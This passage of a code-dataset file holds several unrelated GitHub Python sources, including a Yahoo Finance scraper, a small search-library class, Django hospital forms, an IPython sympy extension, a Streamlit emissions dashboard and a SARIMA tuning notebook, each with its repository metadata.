= Profile_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Profile = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Executives = Profile_Extract2(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Executives = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Income_Statement_Annual = Financial_Extract(Company_name, \"financials\",1)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Income_Statement_Annual = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Income_Statement_Quarterly = Financial_Extract_Quarterly(Company_name, \"financials\",1)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Income_Statement_Quarterly = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Balance_Sheet_Annual = Financial_Extract(Company_name, \"balance-sheet\",2)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Balance_Sheet_Annual = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Balance_Sheet_Quarterly = Financial_Extract_Quarterly(Company_name, \"balance-sheet\",2)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Balance_Sheet_Quarterly = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Cash_Flow_Annual = Financial_Extract(Company_name, \"cash-flow\",3)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Cash_Flow_Annual = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Cash_Flow_Quarterly = Financial_Extract_Quarterly(Company_name, \"cash-flow\",3)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Cash_Flow_Quarterly = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Earnings_Estimate,Revenue_Estimate,Earnings_History_DF,EPS_Trend,EPS_Revisions,Growth_Estimates = Analysis_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Earnings_Estimate,Revenue_Estimate,Earnings_History_DF,EPS_Trend,EPS_Revisions,Growth_Estimates = Error_Extract()\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n \n try:\n Major_Holders,Top_Institutional_Holders2,Top_Mutual_Fund_Holders = Holders_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Major_Holders,Top_Institutional_Holders2,Top_Mutual_Fund_Holders = Error_Extract2()\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n \n try:\n Insider_Roster = Insider_Roster_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Insider_Roster = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Ins_Transac_6_mo,Net_Institutional_Transac = Insider_Transactions_Extract1(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Ins_Transac_6_mo,Net_Institutional_Transac = Error_Extract3()\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Insider_Transac_2_yr = Insider_Transactions_Extract2(Company_name)\n percent_done = 100\n print(str(percent_done)+\"% Completed\")\n except:\n Insider_Transac_2_yr = pd.DataFrame(error_list)\n percent_done = 100\n print(str(percent_done)+\"% Completed\")\n\n # if(lossy_flag==1):\n # lossy_tickers.append(Company_name)\n #--------------------------------------------------------------Saving all the dataframes into the excel file\n\n #dflist= [Income_Statement_Annual,Balance_Sheet_Annual,Cash_Flow_Annual]\n dflist= [Profile,News,Press,Executives,Summary,Statistics,Historical_Data,Dividends,Splits,Income_Statement_Annual,Income_Statement_Quarterly,Balance_Sheet_Annual,Balance_Sheet_Quarterly,Cash_Flow_Annual,Cash_Flow_Quarterly,Earnings_Estimate,Revenue_Estimate,Earnings_History_DF,EPS_Trend,EPS_Revisions,Growth_Estimates,Major_Holders,Top_Institutional_Holders2,Top_Mutual_Fund_Holders,Insider_Roster,Ins_Transac_6_mo,Net_Institutional_Transac,Insider_Transac_2_yr]\n for i in dflist:\n for col in i.columns[1:]:\n try:\n i[col] = i[col].str.replace(',', '').astype(float)\n except:\n i[col] = i[col]\n \n # We'll define an Excel writer object and the target file\n Excel_File_Name = str(exceldate) + '_' + Company_name + \".xlsx\"\n Excelwriter = pd.ExcelWriter(Excel_File_Name,engine=\"xlsxwriter\",engine_kwargs={'options': {'strings_to_numbers': False}})\n\n sheet_list = []\n #We now loop process the list of dataframes\n for df in dflist:\n sheet_list.append(retrieve_name(df)[0])\n df.to_excel(Excelwriter, sheet_name=retrieve_name(df)[0],index=False)\n\n # Profile.to_excel(Excelwriter,sheet_name='Result',startrow=1 , startcol=0)\n # Executives.to_excel(Excelwriter,sheet_name='Result',startrow=Profile.shape[0] + 5, startcol=0)\n\n for sheet1 in sheet_list:\n # Auto-adjust columns' width\n try:\n for column in df:\n try:\n #ExcelWriter.sheets[sheet1].write(0,column,val,header_format)\n column_width = max(df[column].astype(str).map(len).max(), len(column))\n col_idx = df.columns.get_loc(column)\n Excelwriter.sheets[sheet1].set_column(col_idx, col_idx, column_width)\n except:\n continue\n except:\n continue\n\n #And finally save the file\n Excelwriter.save()\n \n print(\"EXCEL FILE DOWNLOADED SUCCESSFULLY FOR --->\",Company_name)\n \n print(\"DOWNLOADED TICKERS FOR: \",Company_name_list)\n\n if(len(wrong_tickers)>0):\n print(\"PLEASE ENTER CORRECT TICKER NAMES FOR THE FOLLOWING TICKER(s)--->\",wrong_tickers)\n\n # if(len(lossy_tickers)>0):\n # print(\"SOME OF THE DATA WAS LOST WHILE SCRAPING THESE TICKER(s)--->\",lossy_tickers)\n\n \n Company_name_list = []\n while(1):\n user_input = input(\"ENTER TICKER NAME (TYPE 'START' AND PRESS ENTER TO STOP READING AND START EXTRACTING): \")\n if(user_input==\"START\"):\n break\n Company_name_list.append(user_input)\n\n wrong_tickers = []\n for i in Company_name_list:\n test_URL = \"https://finance.yahoo.com/quote/\" + i\n driver.get(test_URL)\n if(\"lookup\" in str(driver.current_url)):\n wrong_tickers.append(i)\n del i\n \n\n main_fun(Company_name_list,wrong_tickers)\n\n\n\ndef test(Company_name):\n df1 = News_Extract(Company_name)\n df2 = Press_Extract(Company_name)\n\n dflist= [df1,df2]\n # for col in Income_Statement_Annual.columns[1:]:\n # try:\n # Income_Statement_Annual[col] = Income_Statement_Annual[col].str.replace(',', '').astype(float)\n # except:\n # Income_Statement_Annual[col] = Income_Statement_Annual[col]\n\n Excel_File_Name = Company_name + \".xlsx\"\n Excelwriter = pd.ExcelWriter(Excel_File_Name,engine=\"xlsxwriter\",engine_kwargs={'options': {'strings_to_numbers': False}})\n\n for df in dflist:\n df.to_excel(Excelwriter, sheet_name=retrieve_name(df)[0],index=False)\n Excelwriter.save()\n\n#---------------------------------------------------------------------------CALL FUNCTIONS---------------------------------------------------\n\n# def correct_url_checker():\n# user_input_fun = input(\"ENTER TICKER NAME (TYPE 'START' AND PRESS ENTER TO STOP READING TICKERS): \")\n# if(user_input_fun==\"START\"):\n# return \"START\"\n# print(\"PROCESSING....\")\n# test_URL = \"https://finance.yahoo.com/quote/\" + user_input_fun\n# driver.get(test_URL)\n# if(\"lookup\" in str(driver.current_url)):\n# print(\"PLEASE ENTER A VALID TICKER FOR \"+str(user_input_fun))\n# return correct_url_checker()\n# else:\n# return user_input_fun\n\n# Company_name_list = []\n# while(1):\n# user_input = correct_url_checker()\n# if(user_input==\"START\"):\n# break\n# Company_name_list.append(user_input)\n\n# main_fun(Company_name_list)\n\n\n\nCompany_name_list = []\nwhile(1):\n user_input = input(\"ENTER TICKER NAME (TYPE 'START' AND PRESS ENTER TO STOP READING AND START EXTRACTING): \")\n if(user_input==\"START\"):\n break\n Company_name_list.append(user_input)\n\nwrong_tickers = []\nfor i in Company_name_list:\n test_URL = \"https://finance.yahoo.com/quote/\" + i\n driver.get(test_URL)\n if(\"lookup\" in str(driver.current_url)):\n wrong_tickers.append(i)\n Company_name_list.remove(i)\n\n#print(Company_name_list)\nif(len(wrong_tickers)>0):\n print(\"INCORRECT TICKERS, ENTER PROPERLY IN THE NEXT RUN-->\",wrong_tickers)\n\nmain_fun(Company_name_list,wrong_tickers)\n\n\n\n\n\n\n\n\n\n#test(\"IBM\")\n\n\n#--------------------------------------------------------------Close and Exit\ndriver.close()\n\n\n","repo_name":"Swapnil0115/Finance-Data-Scraper","sub_path":"Yahoo_Fin_v6/main_version_6.py","file_name":"main_version_6.py","file_ext":"py","file_size_in_byte":42883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"27747485350","text":"import os\n\nfrom main import choice_char_class, start_training\n\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ndir_files = [filename.lower() for filename in os.listdir(BASE_DIR)]\n\nfiles_list = ['main.py', 'readme.md']\n\n\ndef test_program():\n for filename in files_list:\n assert filename in dir_files, f'Файл `{filename}` не найден'\n\n\ndef main():\n print('Приветствую тебя, искатель приключений!')\n print('Прежде чем начать игру...')\n char_name = input('...назови себя: ')\n print(f'Здравствуй, {char_name}! '\n 'Сейчас твоя выносливость — 80, атака — 5 и защита — 10.')\n print('Ты можешь выбрать один из трёх путей силы:')\n print('Воитель, Маг, Лекарь')\n char_class = choice_char_class()\n print(start_training(char_name, char_class))\n main()\n","repo_name":"total-art/character_creation_module","sub_path":"test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"4"} +{"seq_id":"28941963858","text":"import pickle\nfrom os import PathLike\nfrom typing import Generic, List, Literal, Optional, Tuple, Type, TypeVar, Union, overload\n\nfrom tinysearch.indexers import Indexer\nfrom tinysearch.storages import Storage\nfrom tinysearch.typing import Analyzer, Document, Matrix\nfrom tinysearch.vectorizers import Vectorizer\n\nSelf = TypeVar(\"Self\", bound=\"TinySearch\")\n\n\nclass TinySearch(Generic[Document, Matrix]):\n def __init__(\n self,\n storage: Storage[Document],\n indexer: Indexer[Matrix],\n vectorizer: Vectorizer[Matrix],\n analyzer: Analyzer,\n ) -> None:\n self.storage: Storage[Document] = storage\n self.indexer: Indexer[Matrix] = indexer\n self.vectorizer: Vectorizer[Matrix] = vectorizer\n self.analyzer = analyzer\n\n @overload\n def search(\n self,\n query: str,\n *,\n topk: Optional[int] = ...,\n ) -> List[Document]:\n ...\n\n @overload\n def search(\n self,\n query: str,\n *,\n return_scores: Literal[False],\n topk: Optional[int] = ...,\n ) -> List[Document]:\n ...\n\n @overload\n def search(\n self,\n query: str,\n *,\n return_scores: Literal[True],\n topk: Optional[int] = ...,\n ) -> List[Tuple[Document, float]]:\n ...\n\n @overload\n def search(\n self,\n query: List[str],\n *,\n topk: Optional[int] = ...,\n ) -> List[List[Document]]:\n ...\n\n @overload\n def search(\n self,\n query: List[str],\n *,\n return_scores: Literal[False],\n topk: Optional[int] = ...,\n ) -> List[List[Document]]:\n ...\n\n @overload\n def search(\n self,\n query: List[str],\n *,\n return_scores: Literal[True],\n topk: Optional[int] = ...,\n ) -> List[List[Tuple[Document, float]]]:\n ...\n\n def search(\n self,\n query: Union[str, List[str]],\n *,\n return_scores: bool = False,\n topk: Optional[int] = 10,\n ) -> Union[List[Document], List[Tuple[Document, float]], List[List[Document]], List[List[Tuple[Document, float]]]]:\n return_as_batch = True\n if isinstance(query, str):\n query = [query]\n return_as_batch = False\n\n batched_tokens = [self.analyzer(q) for q in query]\n query_vector = self.vectorizer.vectorize_queries(batched_tokens)\n results = self.indexer.search(query_vector, topk=topk)\n\n output: Union[List[List[Document]], List[List[Tuple[Document, float]]]]\n if return_scores:\n output = [[(self.storage[id_], score) for id_, score in result] for result in results]\n else:\n output = [[self.storage[id_] for id_, _ in result] for result in results]\n if return_as_batch:\n return output\n return output[0]\n\n def save(self, filename: Union[str, PathLike]) -> None:\n with open(filename, \"wb\") as pklfile:\n pickle.dump(self, pklfile)\n\n @classmethod\n def load(cls: Type[Self], filename: Union[str, PathLike]) -> Self:\n with open(filename, \"rb\") as pklfile:\n searcher = pickle.load(pklfile)\n if not isinstance(searcher, cls):\n raise TypeError(f\"Expected type {cls.__name__}, got {type(searcher).__name__}\")\n return searcher\n","repo_name":"altescy/tinysearch","sub_path":"tinysearch/tinysearch.py","file_name":"tinysearch.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"4"} +{"seq_id":"32286854969","text":"from django import forms\nfrom django.forms import DateInput\nfrom django.forms import DateTimeInput\n# from django.forms import ModelForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User \nfrom .models import *\n\nclass NewPatientForm(forms.ModelForm):\n class Meta:\n model = Patient\n fields = '__all__'\n widgets = {\n 'birthday': DateInput(attrs={'type': 'date'}),\n }\n\nclass DiagnosisForm(forms.ModelForm): \n class Meta:\n model = PatientHasDiagnosis\n fields = '__all__'\n\nclass CheckUpForm(forms.ModelForm):\n class Meta:\n model = Condition_Check_UP\n fields = '__all__'\n\nclass AllergensForm(forms.ModelForm):\n class Meta:\n model = PatientHasAllergy\n fields = '__all__'\n widgets = {\n 'allergy': forms.CheckboxSelectMultiple\n }\n\nclass NewAppointment(forms.ModelForm):\n class Meta:\n model = NextAppointment\n fields = ['patient', 'staff', 'receptionits', 'date']\n widgets = {\n 'date': DateTimeInput(attrs={'type': 'datetime-local'}),\n }\n\nclass CreateUserForm(UserCreationForm):\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2']","repo_name":"niqolla/hospital_managment_app_django","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"35511613673","text":"def createExpLog(logFile, currentExperiment):\n f_log = open(logFile, 'a+') # open file for appending and reading. Current position is at end of file\n \n f_log.seek(0) # set current position at start of file\n \n line = f_log.readline()[0:-1] # discard the \\n at the end of the line\n while line:\n if line == currentExperiment:\n f_log.close()\n return\n \n # read another line until EOF\n line = f_log.readline()[0:-1] \n \n if not f_log.closed:\n # if function got to this point, means that currentExperiment is not in logFile\n f_log.write(currentExperiment + '\\n')\n f_log.close()\n \n","repo_name":"pabloj100000/work","sub_path":"ExpLog/createExpLog.py","file_name":"createExpLog.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"70121084919","text":"from IPython.lib.latextools import latex_to_png\nfrom IPython.testing import decorators as dec\n# use @dec.skipif_not_sympy to skip tests requiring sympy\n\ntry:\n from sympy import pretty, latex\nexcept ImportError:\n pass\n\n\n#-----------------------------------------------------------------------------\n# Definitions of magic functions for use with IPython\n#-----------------------------------------------------------------------------\n\ndef print_basic_unicode(o, p, cycle):\n \"\"\"A function to pretty print sympy Basic objects.\"\"\"\n if cycle:\n return p.text('Basic(...)')\n out = pretty(o, use_unicode=True)\n if '\\n' in out:\n p.text('\\n')\n p.text(out)\n\n\ndef print_png(o):\n \"\"\"A function to display sympy expression using LaTex -> PNG.\"\"\"\n s = latex(o, mode='inline')\n # mathtext does not understand certain latex flags, so we try to replace\n # them with suitable subs.\n s = s.replace('\\\\operatorname','')\n s = s.replace('\\\\overline', '\\\\bar')\n png = latex_to_png(s)\n return png\n\n_loaded = False\n\ndef load_ipython_extension(ip):\n \"\"\"Load the extension in IPython.\"\"\"\n global _loaded\n if not _loaded:\n plaintext_formatter = ip.display_formatter.formatters['text/plain']\n\n for cls in (object, tuple, list, set, frozenset, dict, str):\n plaintext_formatter.for_type(cls, print_basic_unicode)\n\n plaintext_formatter.for_type_by_name(\n 'sympy.core.basic', 'Basic', print_basic_unicode\n )\n plaintext_formatter.for_type_by_name(\n 'sympy.matrices.matrices', 'Matrix', print_basic_unicode\n )\n\n png_formatter = ip.display_formatter.formatters['image/png']\n\n png_formatter.for_type_by_name(\n 'sympy.core.basic', 'Basic', print_png\n )\n _loaded = True\n\n","repo_name":"jupyter-attic/ipython-py3k","sub_path":"IPython/extensions/sympyprinting.py","file_name":"sympyprinting.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"4"} +{"seq_id":"8187672203","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom pymongo import MongoClient\nimport datetime as dt\nfrom datetime import datetime\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom matplotlib.dates import DateFormatter, MinuteLocator\nimport plotly.express as px\nimport altair as alt\n\n\ndef main():\n st.set_page_config(layout='wide')\n\n st.markdown(\"\"\"\n \n \"\"\", unsafe_allow_html=True)\n \n mongo_client = MongoClient(**st.secrets[\"mongo\"])\n db = mongo_client.watt_time\n\n st.write('''\n # The Cleanest Time to Clean!\n Or play video games, make a smoothie, use power tools, plug in your electric [bike, moped, motorcycle, car], etc. \n Basically anything that involves using electricity!\n ''')\n st.text(\"\")\n st.write('''\n - Simply select your electricity grid region\n - Observe the forecasted Marginal Operating Emissions Rate (MOER) value\n - If it's low, you're good to go!\n ''')\n st.text(\"\")\n st.text(\"\")\n \n\n col3, col4, col5 = st.columns([20,5,1])\n with col3:\n #st.markdown('

Created with MOER

', unsafe_allow_html=True)\n st.write('Created with real-time and historical MOER values from')\n with col4:\n st.image('./watttime_logo.png')\n with col5:\n st.write('API')\n \n\n st.markdown('

Select your Grid Region

', unsafe_allow_html=True)\n BA = st.selectbox('', ['CAISO_NORTH'])\n ba_heatmap = BA + '_heatmap'\n ba_dailyline = BA + '_dailyline'\n ba_weeklyline = BA + '_weeklyline'\n\n heatmap_df = pd.DataFrame(list(db[ba_heatmap].find({}, {'_id': 0, 'year': 1, 'month': 1, 'weekday': 1, 'time': 1, 'value': 1})))\n dailyline_df = pd.DataFrame(list(db[ba_dailyline].find({}, {'_id': 0, 'time': 1, 'forecast': 1, 'moer_today': 1,\n 'moer_1week': 1, 'moer_2week': 1, 'moer_3week': 1})))\n weeklyline_df = pd.DataFrame(list(db[ba_weeklyline].find({}, {'_id': 0, 'point_time': 1, 'forecast': 1, 'moer_today': 1,\n 'moer_1week': 1, 'moer_2week': 1, 'moer_3week': 1})))\n\n st.text(\"\")\n\n \n # display daily line chart\n\n st.write(\n ''' \n ## **Daily Forecast**\n ''')\n \n st.write('''\n #### Choose previous week(s) by number to compare and contrast:\n '''\n )\n\n fig2, ax2 = plt.subplots()#figsize = (24, 18))\n\n weeks = st.multiselect(\"\", [1, 2, 3])\n\n plt.plot(dailyline_df['time'], dailyline_df['forecast'], label = \"Today's Forecast\", linestyle=\"-\")\n plt.plot(dailyline_df['time'], dailyline_df['moer_today'], label = \"Today's Actual\", linestyle=\"--\")\n\n if (1 in weeks):\n plt.plot(dailyline_df['time'], dailyline_df['moer_1week'], label = \"1 Week Ago Today\", linestyle=\"-.\")\n if (2 in weeks):\n plt.plot(dailyline_df['time'], dailyline_df['moer_2week'], label = \"2 Weeks Ago Today\", linestyle=\"--\")\n if (3 in weeks):\n plt.plot(dailyline_df['time'], dailyline_df['moer_3week'], label = \"3 Weeks Ago Today\", linestyle=\"--\")\n plt.xlabel('Time of Day')\n plt.ylabel('MOER Value')\n \n x_ticks = np.arange(0, 288, 12)\n plt.xticks(x_ticks, rotation = 45)\n plt.legend()\n st.pyplot(fig2)\n\n # display historical moer as an interactive heatmap\n st.write('''\n ## **Actual MOER Values** #### \n ### **By Weekday and Time of Day**''')\n \n col1, col2 = st.columns([1, 5])\n col1.markdown('

Select Year

', unsafe_allow_html=True)\n select_year = col1.radio('', heatmap_df['year'].unique())\n st.markdown('

Select Time of Day of MOER Value

', unsafe_allow_html=True)\n st.text(\"(Time in UTC - Add 7 hours for PST)\")\n slider_time = st.slider('',\n datetime.strptime(heatmap_df['time'].unique().min(), '%H:%M:%S').time(),\n datetime.strptime(heatmap_df['time'].unique().max(), '%H:%M:%S').time())\n slider_time = slider_time.strftime('%H:%M:%S')\n\n\n fig, ax = plt.subplots()#figsize = (24, 18))\n # ax.set_title('Monthly MOER values by Day of the Week')\n\n # prepare data for heatmap: filter, then transform into matrix\n df = heatmap_df[(heatmap_df['year'] == select_year) &\n (heatmap_df['time'] == slider_time)].reset_index().copy()\n\n day_month = {1: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 2: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 3: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 4: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 5: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 6: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 7: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0}}\n \n for i in range(len(df)):\n day_month[df.loc[i]['weekday']][df.loc[i]['month']] = df.loc[i]['value']\n \n data_rows = list(day_month.values())\n heatmap_data = []\n\n for i in range(0, len(data_rows)):\n heatmap_data.append(list(data_rows[i].values()))\n \n sns.heatmap(data = heatmap_data, square=True, cbar_kws={\"shrink\": .6},\n xticklabels = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',\n 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'],\n yticklabels = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'])\n col2.pyplot(fig)\n\n # display weekly line chart\n\n st.write(\n ''' \n ## **Weekly Forecast**\n ''')\n \n st.write('''\n #### Choose previous weeks to compare and contrast:\n '''\n )\n\n fig3, ax3 = plt.subplots()\n\n weekly_weeks = st.multiselect(\"\", [\"One Week\", \"Two Weeks\", \"Three Weeks\"])\n\n plt.plot(weeklyline_df['point_time'], weeklyline_df['forecast'], label = \"This Week's Forecast\", linestyle=\"-\")\n plt.plot(weeklyline_df['point_time'], weeklyline_df['moer_today'], label = \"This Week's Actual\", linestyle=\"--\")\n\n if (\"One Week\" in weekly_weeks):\n plt.plot(weeklyline_df['point_time'], weeklyline_df['moer_1week'], label = \"1 Week Ago\", linestyle=\"-.\")\n if (\"Two Weeks\" in weekly_weeks):\n plt.plot(weeklyline_df['point_time'], weeklyline_df['moer_2week'], label = \"2 Weeks Ago\", linestyle=\"--\")\n if (\"Three Weeks\" in weekly_weeks):\n plt.plot(weeklyline_df['point_time'], weeklyline_df['moer_3week'], label = \"3 Weeks Ago\", linestyle=\"--\")\n plt.xlabel('Day and Time')\n plt.ylabel('MOER Value')\n \n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%d-%m-%Y'))\n plt.gca().xaxis.set_major_locator(mdates.DayLocator())\n plt.gcf().autofmt_xdate()\n \n plt.legend()\n st.pyplot(fig3)\n\nif __name__ == '__main__':\n main()\n","repo_name":"charliedogmel/Engineering_Project","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":7226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"7836691836","text":"#exceptions = events detected during execution that interrupts the flow of a program\r\n\r\ndef divide():\r\n num = int(input(\"Enter a numerator: \"))\r\n den = int(input(\"Enter a denominator: \"))\r\n result = num / den\r\n return result\r\n\r\n#print(divide())\r\n\r\n#what happens if we divide by zero\r\n\r\n\"\"\" Traceback (most recent call last):\r\n File \"fileName\", line 9, in \r\n print(divide())\r\n File \"fileName\", line 6, in divide\r\n result = num / den\r\nZeroDivisionError: division by zero \"\"\"\r\n\r\n#use a try statement to test dangerous code\r\n\r\ntry:\r\n num = int(input(\"Enter a numerator: \"))\r\n den = int(input(\"Enter a denominator: \"))\r\n result = num / den\r\nexcept ZeroDivisionError as e:\r\n print(e)\r\n print(\"You can't divide by 0 !\")\r\nexcept ValueError as e:\r\n print(e)\r\n print(\"Enter only numbers.\")\r\nexcept Exception:\r\n print(\"Something went wrong...\")\r\n#when there are no more exceptions left\r\nelse:\r\n print(result)\r\n#this is always at the end. Even if we catch an exception, we will always run this block of code\r\n#useful for closing files when dealing with files\r\nfinally:\r\n print(\"This will always execute\")\r\n\r\n#now the try will catch the exception and continue running the code without being interrupted\r\n#you can catch multiple exceptions\r\n#don't just use \"Exceptions\" because it is considered bad practice\r\n","repo_name":"Nickthecan/LearningPython","sub_path":"exceptionHandling.py","file_name":"exceptionHandling.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"31732766077","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# $$\\large \\color{green}{\\textbf{Optimizing the SARIMA algorithm}}$$ \n# \n# $$\\large \\color{blue}{\\textbf{Phuong Van Nguyen}}$$\n# $$\\small \\color{red}{\\textbf{ phuong.nguyen@summer.barcelonagse.eu}}$$\n# \n# \n# This Machine Learning program was written by Phuong V. Nguyen, based on the $\\textbf{Anacoda 1.9.7}$ and $\\textbf{Python 3.7}$.\n# \n# \n# $$\\underline{\\textbf{Main Contents}}$$\n# \n# $\\text{1. Main Job:}$ The SARIMA algorithm is one of the most common forecasting tools. An optimal SARIMA would make a better forecast for a number of interesting time-series variables. Thus, the main purpose of this project is to introduce how to optimize SARIMA algorithm. Three criteria, such as Akaike Information Criterion (AIC), Bayesian Information Criterion (BIC), and Log-Likelihood, are used to choose the optimal SARIMA model.\n# \n# $\\text{2. Dataset:}$ \n# \n# One can download the dataset used to replicate my project at my Repositories on the Github site below\n# \n# https://github.com/phuongvnguyen/Optimizing-the-SARIMA-algorithm\n# \n\n# # Preparing Problem\n# \n# ## Loading Libraries\n# \n# \n\n# In[2]:\n\n\nimport warnings\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom statsmodels.tsa.arima_model import ARIMA\n#import pmdarima as pm\nwarnings.filterwarnings(\"ignore\")\nplt.style.use('fivethirtyeight')\nimport pandas as pd\nimport statsmodels.api as sm\nimport matplotlib\nmatplotlib.rcParams['axes.labelsize'] = 14\nmatplotlib.rcParams['xtick.labelsize'] = 12\nmatplotlib.rcParams['ytick.labelsize'] = 12\nmatplotlib.rcParams['text.color'] = 'k'\n\n\n# ## Defining some varibales for printing the result\n\n# In[3]:\n\n\nPurple= '\\033[95m'\nCyan= '\\033[96m'\nDarkcyan= '\\033[36m'\nBlue = '\\033[94m'\nGreen = '\\033[92m'\nYellow = '\\033[93m'\nRed = '\\033[91m'\nBold = \"\\033[1m\"\nReset = \"\\033[0;0m\"\nUnderline= '\\033[4m'\nEnd = '\\033[0m'\n\n\n# ## Loading Dataset\n\n# In[24]:\n\n\ndata = pd.read_excel(\"data.xlsx\")\ndata.head(5)\n\n\n# In[25]:\n\n\nclosePrice = data[['DATE','CLOSE']]\nclosePrice.head(5)\n\n\n# In[26]:\n\n\nclosePrice =closePrice.set_index('DATE')\nclosePrice.head()\n\n\n# In[27]:\n\n\nclosePrice.index\n\n\n# It is $NOT$ good. Please, find an appropriate solution for fulfilling missing data after using the above function $\\textbf{asfreq()}$\n\n# # Optimizing model \n\n# We are going to apply one of the most commonly used method for time-series forecasting, known as ARIMA, which stands for Autoregressive Integrated Moving Average.\n# \n# ARIMA models are denoted with the notation $ARIMA(p, d, q)$. These three parameters account for seasonality, trend, and noise in data:\n\n# ## Find the Optimal ARIMA Model\n\n# This step is parameter Selection for our furniture’s sales ARIMA Time Series Model. Our goal here is to use a “grid search” to find the optimal set of parameters that yields the best performance for our model.\n\n# ## Setting a set of hyperparameters\n\n# In[41]:\n\n\np = d = q = range(0, 3)\npdq = list(itertools.product(p, d, q))\npdq\n\n\n# In[42]:\n\n\nprint(Bold + 'A Number of combinations: {}'.format(len(pdq)))\n\n\n# In[43]:\n\n\nprint(Bold + 'Examples of parameter combinations for ARIMA...' + End)\nprint('ARIMA: {}'.format(pdq[1]))\nprint('ARIMA: {}'.format(pdq[2]))\nprint('ARIMA: {}'.format(pdq[3]))\nprint('ARIMA: {}'.format(pdq[4]))\n\n\n# ## Finding the Optimal Set of Hyperparameters \n\n# In[44]:\n\n\nAIC=list()\nBIC=list()\npara=list()\nLihood=list()\nprint(Bold + 'Training ARIMA with a Number of Configuration:'+ End)\nfor param in pdq:\n mod=sm.tsa.statespace.SARIMAX(closePrice,order=param,seasonal_order=(0, 0, 0, 0), \n enforce_stationarity=False, enforce_invertibility=False)\n results= mod.fit()\n para.append(param)\n AIC.append(results.aic)\n BIC.append(results.bic)\n Lihood.append(results.llf)\n print('ARIMA{} - AIC:{} - BIC:{} - Log likehood: {}'.format(param,results.aic, \n results.bic,results.llf))\n \nprint(Bold +'The Optimal Choice Suggestions:'+End)\nprint('The minimum value of Akaike Information Criterion (AIC):{}'.format(min(AIC)))\nprint('The minimum value 